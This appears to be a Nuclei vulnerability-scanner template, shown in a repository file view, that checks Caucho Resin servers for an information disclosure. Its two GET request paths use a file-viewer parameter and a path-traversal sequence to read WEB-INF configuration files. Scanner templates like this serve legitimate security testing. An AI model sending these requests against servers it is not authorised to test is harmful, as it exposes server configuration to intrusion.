nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosur...

22 lines
471 B
YAML
Raw Normal View History

2021-02-01 17:32:39 +00:00
id: caucho-resin-info-disclosure
info:
name: Caucho Resin Information Disclosure
author: pikpikcu
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" #ver:3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" #ver:3.1.1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "WEB-INF"
2021-02-01 17:32:39 +00:00
part: body